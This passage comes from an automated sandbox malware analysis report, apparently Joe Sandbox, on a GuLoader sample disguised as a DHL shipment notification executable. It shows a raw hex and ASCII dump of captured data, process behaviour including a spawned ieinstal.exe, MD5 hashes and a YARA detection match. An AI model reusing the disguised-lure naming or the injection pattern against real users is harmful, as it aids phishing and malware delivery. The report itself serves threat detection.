5a 2c 02 5e c6 75 0a b3 7a 64 15 df 68 0d 55 cc c6 23 e6 56 ef 0b a3 89 12 69 a8 15 6b 74 07 8f ed 70 43 29 23 6b 18 83 29 47 c5 be 43 c6 c3 78 ee 89 87 44 bb 1c 15 44 61 8d 39 5e 7d 7d bd 93 40 82 79 a8 d4 0b b6 eb e1 cb 9d b2 e3 6f a9 3b be e8 72 da 3c 38 0a fc 21 8f 62 c6 f4 ba 37 8f e4 21 a9 77 02 f8 a5 69 fb a8 fa 6b 38 2e ae c8 b5 5b ad 13 a9 bf 34 d2 32 9b cc 7c 59 ea c3 49 cc ef 58 e8 2d 00 48 dd 9b c6 b0 b0 46 90 24 72 f9 48 ec e3 c9 a6 05 1a 94 7f 25 30 cd 61 d8 48 af 03 11 d0 c2 6b c7 3f 49 6c 80 17 f1 10 47 33 5c 32 62 4c ba 16 da 13 d6 f8 5a d1 29 7f 0a 6b 62 3e 86 3e 1f 33 44 98 b7 85 f0 e6 4a 67 e3 32 d1 a7 2e a1 84 0e 44 a8 c5 ed fc ad 24 28 b8 3b 60 eb e5 5c 39 4c 8c ed 4e 0d 9e ce 58 90 18 27 f1 2f 37 a3 bc b2 10 80 71 0e 38 43 99 48 47 02 a5 20 62 0a 90 7c b3 a1 25 59 18 32 70 3e 4a 93 6f fc f7 5c 61 18 ac 16 18 d8 ed 1e 44 40 a8 e2 86 11 9b 5a ca ae 1d e2 fc 3c b7 c9 ba 7c ad 9f ed 99 cb c7 69 ce 19 75 97 af 4b 8c 14 ef 98 13 f7 2c cb 92 c4 60 5a c8 10 64 2c 7c ab fd 2c ce bb 78 59 eb 2f 45 a9 0e d4 ab b8 fb fe 39 45 50 c0 45 19 36 dc c4 fe e9 5f 2d 8e 91 a1 60 a6 63 b8 fb ba cf 25 33 40 0a 18 a7 c6 71 51 0c 87 c5 a4 78 69 9d 86 28 c7 d2 5d c0 38 41 56 5c ea 96 5d 27 b1 0c 6f 34 de 26 b5 db 6c 3f 3f a8 12 7d 56 a2 34 7f a5 f7 81 38 99 7b 7b 34 b7 44 63 15 f6 4b e2 db 86 73 1f 80 c2 a7 5c 12 0e a3 e7 93 06 24 8b 24 e3 f6 fa 62 16 3f 16 20 f5 7c 61 5a 9d 0e d5 b3 ed 86 8c 0e cd f8 b8 34 34 a4 ef a0 0a 05 0b bc 71 c3 06 23 a0 be 26 e1 6a fe 45 ad 3c d4 46 d8 31 4a 7a 96 a7 e7 8d aa 81 9b c2 40 09 a4 30 7e 6f 05 cd 04 01 ff a2 12 dd 34 98 5c 3d b0 44 4d 08 76 2c b5 4d 65 ad 01 c8 aa 13 87 24 b9 97 dd 6e f1 c7 9a 4f 07 9a 81 51 78 c0 0c 98 91 fb 2f a2 ed 7c 8c 9e f7 03 9e 57 0c 7d 67 bf f8 45 3f e8 36 4e a7 53 8e 48 a4 c4 31 f4 fc 10 61 b3 22 bc 38 db 49 65 13 12 a6 e7 7e 99 9f 75 5d 58 f8 48 77 7a f4 e0 8e a4 ee f6 6b 1d 3f 71 34 2c 09 f4 d2 b3 5a 25 80 52 98 7c ce 1b 6c cd e2 71 17 bb 48 bc b6 e4 83 3a ad 45 60 27 23 ed 78 42 81 47 e6 9a 55 e9 23 0f 6f ab b3 55 10 d5 71 94 e2 56 4e 6d 23 b3 0a 7d 9c 93 33 76 a2 64 9f 8b 5f d0 bc 9b 56 14 60 7f 49 a2 a2 ba a0 bd 71 21 c5 4c e7 d1 04 c4 99 56 8a c5 fc 88 af 93 6f 20 e6 fa 1f f7 fe 61 1c 81 bc
      Data Ascii: MKT62|/]k.kU|=;.GJf]O'w3}cMTv]-Q8Z42e"$Ie~uXHwzk?q4,Z%R|lq%K`* Y+J|O:w5/M~]14-U!L)Y,a5u}hUHZnAskxc'MdoAv_Z[C;I+U;T-:A{8>d"yO-wQwUI1X<Dl)Ynh|pZ,^uzdhU#ViktpC)#k)GCxDDa9^}}@yo;r<8!b7!wik8.[42|YIX-HF$rH%0aHk?IlG3\2bLZ)kb>>3DJg2.D$(;`\9LNX'/7q8CHG b|%Y2p>Jo\aD@Z<|iuK,`Zd,|,xY/E9EPE6_-`c%3@qQxi(]8AV\]'o4&l??}V48{{4DcKs\$$b? |aZ44q#&jE<F1Jz@0~o4\=DMv,Me$nOQx/|W}gE?6NSH1a"8Ie~u]XHwzk?q4,Z%R|lqH:E`'#xBGU#oUqVNm#}3vd_V`Iq!LVo a


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:12:53:20
      Start date:27/09/2021
      Path:C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
      Imagebase:0x400000
      File size:98304 bytes
      MD5 hash:8E2B177D2AB29C95F067559A029CF5E8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Author: Joe Security
      Reputation:low

      General

      Start time:12:53:43
      Start date:27/09/2021
      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
      Imagebase:0xad0000
      File size:480256 bytes
      MD5 hash:7871873BABCEA94FBA13900B561C7C55
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >